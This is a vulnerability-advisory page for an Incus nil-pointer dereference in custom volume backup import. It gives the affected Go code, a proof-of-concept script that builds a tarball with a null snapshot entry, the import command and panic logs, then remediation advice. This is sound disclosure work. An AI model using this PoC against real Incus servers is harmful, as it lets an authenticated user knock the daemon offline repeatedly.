Incus CVE-2026-40197
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
7DescriptionGitHub Advisory
Summary
Missing validation logic in the storage volume import logic allows an authenticated user with access to Incus' storage volume feature to cause the Incus daemon to crash. Repeated use of this issue can be used to keep Incus offline causing a denial of service.
Details
The custom volume backup import subsystem contains a nil-pointer dereference vulnerability that allows an authenticated attacker to crash the daemon during import operations.
In the snapshot import loop, the daemon iterates over entries from srcBackup.Config.VolumeSnapshots, which is a slice of pointers. The implementation assumes that each slice element is non-nil and immediately dereferences it through expressions such as snapshot.Name, snapshot.Config, snapshot.Description, snapshot.CreatedAt, and *snapshot.ExpiresAt without first validating that the element itself is initialized.
Because the YAML unmarshaler accepts explicit null array elements from an attacker-controlled index.yaml and converts them into nil pointers inside the slice, an authenticated attacker can supply a backup archive containing a null entry in the volume_snapshots array. This causes the daemon to dereference a nil pointer during custom volume import and terminate, resulting in immediate denial of service on the node.
Affected File: https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go
Affected Code:
func (b *backend) CreateCustomVolumeFromBackup(srcBackup backup.Info, srcData io.ReadSeeker, op *operations.Operation) error {
[...]
// Create database entries for new storage volume snapshots.
for _, s := range srcBackup.Config.VolumeSnapshots {
snapshot := s // Local var for revert.
snapName := snapshot.Name
// Due to a historical bug, the volume snapshot names were sometimes written in their full form
// (<parent>/<snap>) rather than the expected snapshot name only form, so we need to handle both.
if internalInstance.IsSnapshot(snapshot.Name) {
_, snapName, _ = api.GetParentAndSnapshotName(snapshot.Name)
}
fullSnapName := drivers.GetSnapshotVolumeName(srcBackup.Name, snapName)
snapVolStorageName := project.StorageVolume(srcBackup.Project, fullSnapName)
snapVol := b.GetVolume(drivers.VolumeTypeCustom, drivers.ContentType(srcBackup.Config.Volume.ContentType), snapVolStorageName, snapshot.Config)
// Validate config and create database entry for new storage volume.
// Strip unsupported config keys (in case the export was made from a different type of storage pool).
err = VolumeDBCreate(b, srcBackup.Project, fullSnapName, snapshot.Description, snapVol.Type(), true, snapVol.Config(), snapshot.CreatedAt, *snapshot.ExpiresAt, snapVol.ContentType(), true, true)
if err != nil {
return err
}
reverter.Add(func() { _ = VolumeDBDelete(b, srcBackup.Project, fullSnapName, snapVol.Type()) })
}
[...]
}PoC
The following PoC demonstrates that a crafted custom volume backup archive containing a null entry in volume_snapshots can trigger a nil-pointer dereference during import.
Step 1: Generate the malformed archive
From a client or workstation with shell access, create a custom volume backup archive whose index.yaml contains one physical snapshot directory and a matching volume_snapshots array containing a literal null entry.
Commands:
cat <<EOF > poc_nil_snapshot.sh
#!/bin/bash
set -e
echo "[*] Building null snapshot dereference payload..."
mkdir -p backup/volume
mkdir -p backup/snapshots/snap0
cat <<EOT > backup/index.yaml
name: panic-nil-snap
backend: dir
pool: default
type: custom
snapshots:
- snap0
config:
volume:
name: panic-nil-snap
type: custom
content_type: filesystem
config: {}
volume_snapshots:
- null
EOT
tar -czf exploit_null_snapshot.tar.gz backup/
rm -rf backup/
echo "[+] PoC Tarball Created: exploit_null_snapshot.tar.gz"
EOF
bash poc_nil_snapshot.shResult:
[+] PoC Tarball Created: exploit_null_snapshot.tar.gzStep 2: Trigger the vulnerable custom volume import path
From an Incus client with permission to import custom volumes, import the crafted archive into a valid storage pool.
Command:
incus storage volume import default exploit_null_snapshot.tar.gzResult:
Error: Operation not foundStep 3: Verify the daemon panic
On the Incus host, inspect the service logs and confirm that the daemon terminated with a nil-pointer dereference in CreateCustomVolumeFromBackup.
Command:
journalctl -u incus --since "3 minutes ago" | grep -A 15 "panic:"Result:
panic: runtime error: invalid memory address or nil pointer dereference
github.com/lxc/incus/v6/internal/server/storage.(*backend).CreateCustomVolumeFromBackup(...)
Mar 23 17:27:55 incus-7a incusd[238672]: panic: runtime error: invalid memory address or nil pointer dereference
Mar 23 17:27:55 incus-7a incusd[238672]: [signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x16881c3]
Mar 23 17:27:55 incus-7a incusd[238672]: goroutine 5802 [running]:
Mar 23 17:27:55 incus-7a incusd[238672]: github.com/lxc/incus/v6/internal/server/storage.(*backend).CreateCustomVolumeFromBackup(0x31c86ff85800, {{0x31c870a13203, 0x9}, {0x31c870a13300, 0xe}, {0x31c870a13318, 0x3}, {0x31c86f6d6298, 0x7}, {0x31c86fd13280, ...}, ...}, ...)
Mar 23 17:27:55 incus-7a incusd[238672]: /home/stgraber/Code/lxc/incus/internal/server/storage/backend.go:7627 +0xe03
Mar 23 17:27:55 incus-7a incusd[238672]: main.createStoragePoolVolumeFromBackup.func6(0x31c86fa5e000?)
Mar 23 17:27:55 incus-7a incusd[238672]: /home/stgraber/Code/lxc/incus/cmd/incusd/storage_volumes.go:2715 +0x3f4
Mar 23 17:27:55 incus-7a incusd[238672]: github.com/lxc/incus/v6/internal/server/operations.(*Operation).Start.func1(0x31c86f758140)
Mar 23 17:27:55 incus-7a incusd[238672]: /home/stgraber/Code/lxc/incus/internal/server/operations/operations.go:307 +0x26
Mar 23 17:27:55 incus-7a incusd[238672]: created by github.com/lxc/incus/v6/internal/server/operations.(*Operation).Start in goroutine 5783
Mar 23 17:27:55 incus-7a incusd[238672]: /home/stgraber/Code/lxc/incus/internal/server/operations/operations.go:306 +0x105
Mar 23 17:27:55 incus-7a systemd[1]: incus.service: Main process exited, code=exited, status=2/INVALIDARGUMENT
Mar 23 17:27:55 incus-7a systemd[1]: incus.service: Failed with result 'exit-code'.
Mar 23 17:27:55 incus-7a systemd[1]: incus.service: Unit process 159855 (qemu-system-x86) remains running after unit stopped.
Mar 23 17:27:55 incus-7a systemd[1]: incus.service: Unit process 238744 (dnsmasq) remains running after unit stopped.
Mar 23 17:27:55 incus-7a systemd[1]: incus.service: Unit process 238760 (dnsmasq) remains running after unit stopped.It is recommended to validate that each element of srcBackup.Config.VolumeSnapshots is non-nil before dereferencing it. If the archive contains a null snapshot entry, the function should return a structured validation error and abort the import gracefully rather than allowing a runtime panic to crash the service.
Credit
This issue was discovered and reported by the team at 7asecurity (https://7asecurity.com/)
AnalysisAI
Nil-pointer dereference in Incus daemon's custom volume backup import logic allows authenticated users to crash the service by supplying a malformed backup archive containing null entries in the volume_snapshots array, enabling repeated denial of service attacks. The vulnerability exists in the CreateCustomVolumeFromBackup function which fails to validate snapshot pointers before dereferencing them during import operations. CVSS 6.5 (authenticated network access, high availability impact); no public exploit code or active exploitation reported at analysis time, but proof-of-concept demonstration included in advisory.
Technical ContextAI
Incus is a container and virtual machine management platform written in Go that provides APIs for managing storage volumes, including backup and restore functionality. The vulnerability resides in the storage backend's CreateCustomVolumeFromBackup function (internal/server/storage/backend.go) which processes custom volume backups from YAML-structured tar.gz archives. The function iterates over srcBackup.Config.VolumeSnapshots, a slice of pointers to snapshot configuration objects. The Go YAML unmarshaler accepts explicit null values in YAML arrays and represents them as nil pointers within Go slices. The vulnerable code immediately dereferences slice elements via snapshot.Name, snapshot.Config, snapshot.Description, snapshot.CreatedAt, and *snapshot.ExpiresAt without nil checks. This is a classic nil-pointer dereference (CWE-476) where input validation is missing at the unmarshaling boundary. The root cause is assumption of non-nil slice elements without defensive validation, allowing attacker-controlled YAML content to introduce nil pointers that trigger runtime panics.
RemediationAI
Upgrade Incus to version 7.0.0 or later, which contains the fix for nil-pointer dereference validation in the CreateCustomVolumeFromBackup function. The upstream patch adds explicit nil checks for snapshot pointers before dereferencing them. For environments unable to upgrade immediately, restrict administrative permissions for custom volume backup import operations to trusted users only, as exploitation requires PR:L authentication. Monitor for repeated failed storage volume import operations or daemon crashes, which indicate exploitation attempts. Disable custom volume backup/restore functionality entirely if not actively used, as this eliminates the attack surface. Refer to the official advisory at https://github.com/lxc/incus/security/advisories/GHSA-r7w7-mmxr-47r9 for patched version details and migration guidance. No workarounds are available beyond access control; the fix requires code-level validation that only v7.0.0+ provides.
Same weakness CWE-476 – NULL Pointer Dereference
View allSame technique Null Pointer Dereference
View allVendor StatusVendor
SUSE
Severity: MediumShare
External POC / Exploit Code
Leaving vuln.today
GHSA-r7w7-mmxr-47r9